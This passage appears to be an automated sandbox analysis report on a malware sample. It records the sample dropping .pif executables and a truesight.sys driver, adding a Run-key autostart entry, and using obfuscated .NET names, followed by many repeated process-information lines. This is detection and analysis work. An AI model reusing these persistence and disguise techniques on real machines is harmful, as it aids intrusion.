Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: jphwmyiA.pif.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_02948798 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_02948798

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0295D2FC push 0295D367h; ret	0_2_0295D35F
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029332FC push eax; ret	0_2_02933338
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0293635A push 029363B7h; ret	0_2_029363AF
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0293635C push 029363B7h; ret	0_2_029363AF
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0295D0AC push 0295D125h; ret	0_2_0295D11D
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0295D1F8 push 0295D288h; ret	0_2_0295D280
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0295D144 push 0295D1ECh; ret	0_2_0295D1E4
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029486B8 push 029486FAh; ret	0_2_029486F2
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02936736 push 0293677Ah; ret	0_2_02936772
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02936738 push 0293677Ah; ret	0_2_02936772
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0293C4EC push ecx; mov dword ptr [esp], edx	0_2_0293C4F1
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0293D520 push 0293D54Ch; ret	0_2_0293D544
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0293CB6C push 0293CCF2h; ret	0_2_0293CCEA
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294788C push 02947909h; ret	0_2_02947901
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029468C6 push 02946973h; ret	0_2_0294696B
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_029468C8 push 02946973h; ret	0_2_0294696B
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0293C9CE push 0293CCF2h; ret	0_2_0293CCEA
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294E9E8 push ecx; mov dword ptr [esp], edx	0_2_0294E9ED
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294A917 push 0294A950h; ret	0_2_0294A948
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02948910 push 02948948h; ret	0_2_02948940
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294A918 push 0294A950h; ret	0_2_0294A948
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0294890E push 02948948h; ret	0_2_02948940
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02942EE0 push 02942F56h; ret	0_2_02942F4E
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_0295BFA0 push 0295C1C8h; ret	0_2_0295C1C0
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02942FEC push 02943039h; ret	0_2_02943031
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02942FEB push 02943039h; ret	0_2_02943031
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Code function: 0_2_02945DFC push ecx; mov dword ptr [esp], edx	0_2_02945DFE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_0041C40C push cs; iretd	3_2_0041C4E2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_00423149 push eax; ret	3_2_00423179
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_0041C50E push cs; iretd	3_2_0041C4E2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 3_2_004231C8 push eax; ret	3_2_00423179

Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'Um61XJt4G2w4U', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	File created: C:\Users\Public\Libraries\jphwmyiA.pif			Jump to dropped file
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	File created: C:\Users\Public\Libraries\Aiymwhpj.PIF			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	File created: C:\Windows \SysWOW64\truesight.sys	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	File created: C:\Windows \SysWOW64\truesight.sys

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	File created: C:\Users\Public\Libraries\jphwmyiA.pif			Jump to dropped file
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	File created: C:\Users\Public\Libraries\Aiymwhpj.PIF			Jump to dropped file

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Aiymwhpj			Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Aiymwhpj			Jump to behavior

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_0294A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0294A954

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Process information set: NOOPENFILEERRORBOX
